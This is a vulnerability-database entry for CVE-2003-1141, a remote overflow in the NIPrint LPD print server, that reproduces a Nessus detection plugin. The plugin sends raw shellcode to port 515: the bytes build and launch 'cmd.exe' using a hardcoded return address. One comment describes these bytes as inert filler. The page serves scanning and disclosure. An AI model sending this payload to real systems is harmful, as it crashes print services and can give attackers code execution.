Vulnerabilities > CVE-2003-1141 - Remote Buffer Overrun vulnerability in Network Instruments Niprint Lpd-Lpr Print Server 4.10

047910
CVSS v2 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
network-instruments
nessus
exploit available
metasploit

Summary

Buffer overflow in NIPrint 4.10 allows remote attackers to execute arbitrary code via a long string to TCP port 515.

Vulnerable Configurations

Part Description Count
Hardware
Network_Instruments
1

Exploit-Db

description: NIPrint LPD Request Overflow. CVE-2003-1141. Remote exploit for the Windows platform
id: EDB-ID:16336
last seen: 2016-02-01
modified: 2010-12-25
published: 2010-12-25
reporter: metasploit
source: https://www.exploit-db.com/download/16336/
title: NIPrint LPD Request Overflow

Metasploit

description: This module exploits a stack buffer overflow in the Network Instrument NIPrint LPD service. Inspired by Immunity's VisualSploit :-)
id: MSF:EXPLOIT/WINDOWS/LPD/NIPRINT
last seen: 2019-11-19
modified: 2017-07-24
published: 2006-09-12
references:
reporter: Rapid7
source: https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/lpd/niprint.rb
title: NIPrint LPD Request Overflow

Nessus

NASL family: Denial of Service
NASL id: NIPRINT_DOS.NASL
description: A vulnerability in the NIPrint could allow an attacker to remotely overflow an internal buffer which could allow code execution.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 11926
published: 2003-11-17
reporter: This script is Copyright (C) 2003-2011 Matt North
source: https://www.tenable.com/plugins/nessus/11926
title: NIPrint LPD-LPR Print Server String Handling Remote Overflow
code
#

include("compat.inc");

# Registration pass: when the scanner evaluates the plugin with `description`
# set, only the metadata below is recorded and the script exits before any
# network traffic is generated.
if (description)
{
  # Plugin identity and cross-references to public advisories.
  script_id(11926);
  script_version("1.17");
  script_cve_id("CVE-2003-1141");
  script_bugtraq_id(8968);

  script_name(english:"NIPrint LPD-LPR Print Server String Handling Remote Overflow");

  # Report text shown to the operator.
  script_set_attribute(attribute:"synopsis", value:
"Arbitrary code may be run on the remote host." );
  script_set_attribute(attribute:"description", value:
"A vulnerability in the NIPrint could allow an attacker to remotely 
overflow an internal buffer which could allow code execution." );
  script_set_attribute(attribute:"solution", value:
"None, Contact the vendor:
 http://www.networkinstruments.com/products/niprint.html" );

  # Risk scoring (CVSS v2 base and temporal vectors).
  # NOTE(review): RL:OF in the temporal vector denotes an official fix, while
  # the solution text above says "None" -- confirm which of the two is current.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");

  # Exploit-availability flags; these raise the priority of a finding.
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'NIPrint LPD Request Overflow');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:'CANVAS');

  # Publication dates and plugin bookkeeping.
  script_set_attribute(attribute:"plugin_publication_date", value:"2003/11/17");
  script_set_attribute(attribute:"vuln_publication_date", value:"2003/11/05");
  script_cvs_date("Date: 2018/07/16 14:09:13");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_summary(english:"Checks for vulnerable NIPrint");
  # ACT_DENIAL: the active part of this plugin tries to take the service down,
  # so it belongs with the destructive checks rather than the passive ones.
  script_category(ACT_DENIAL);
  script_copyright(english:"This script is Copyright (C) 2003-2011 Matt North");
  script_family(english:"Denial of Service");

  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");

# Active check: send one oversized request to the LPD port and report the host
# as vulnerable if the service stops answering afterwards.
#
# Operational caveats for whoever schedules this plugin:
#  - The check is destructive. A vulnerable print service is expected to be
#    down after the test and may need a manual restart.
#  - The verdict comes only from the service dying (see the end of the script),
#    not from a banner or version comparison. No check here confirms that the
#    listener on the port is NIPrint, so any LPD daemon on 515 receives the
#    request.
#  - NOTE(review): a service that restarts automatically, or an inline filter
#    that drops the request, would presumably yield a false negative -- confirm
#    against how service_is_dead() probes the port.

# LPD port, matching the advisory summary (TCP 515).
port = 515;
# Nothing to test when the scanner does not consider the port open.
if (! get_port_state(port)) exit(0);

# Fixed byte strings that make up the request. They are kept byte-for-byte;
# the detection logic below does not depend on them being interpreted, only on
# the service's reaction to the request as a whole.
r = raw_string( 0x90,0xCC,0x90,0x90,0x90,0x90,0x8B,0xEC,0x55,0x8B,0xEC,0x33,0xFF,0x57,0x83,0xEC,0x04,0xC6,0x45,0xF8,0x63
,0xC6, 0x45, 0xF9, 0x6D,0xC6,0x45,0xFA,0x64,0xC6,0x45,0xFB,0x2E,0xC6,0x45,0xFC,0x65,0xC6,0x45,0xFD,0x78,
0xC6,0x45,0xFE,0x65,0xB8,0xC3,0xAF,0x01,0x78,0x50,0x8D,0x45,0xF8,0x50,0xFF,0x55,0xF4,0x5F);

r1 = raw_string( 0xCC, 0x83,0xC4,0x04, 0xFF,0xE4);
# 43 filler bytes produced by crap().
r2 = string(crap(43));
r3 = raw_string( 0xcb, 0x50, 0xf9, 0x77);
# Final request: the four pieces concatenated in this order.
bo = r + r1 + r2 + r3;

# open_priv_sock_tcp() connects from a privileged source port -- presumably
# because LPD servers expect one; confirm against the scanner documentation.
soc = open_priv_sock_tcp(dport: port);
# exit(1) signals that the connection could not be made, so no verdict is given.
if (!soc) exit(1);

# One-shot send; no reply is read before the socket is closed.
send(socket:soc,data:bo);

close(soc);

# service_is_dead() comes from the included helper files; a positive result is
# treated as proof that the request crashed the listener, and the finding is
# reported at the highest severity.
if (service_is_dead(port: port) > 0)
  security_hole(port);

Packetstorm

data source: https://packetstormsecurity.com/files/download/83160/niprint.rb.txt
id: PACKETSTORM:83160
last seen: 2016-12-05
published: 2009-11-26
reporter: H D Moore
source: https://packetstormsecurity.com/files/83160/NIPrint-LPD-Request-Overflow.html
title: NIPrint LPD Request Overflow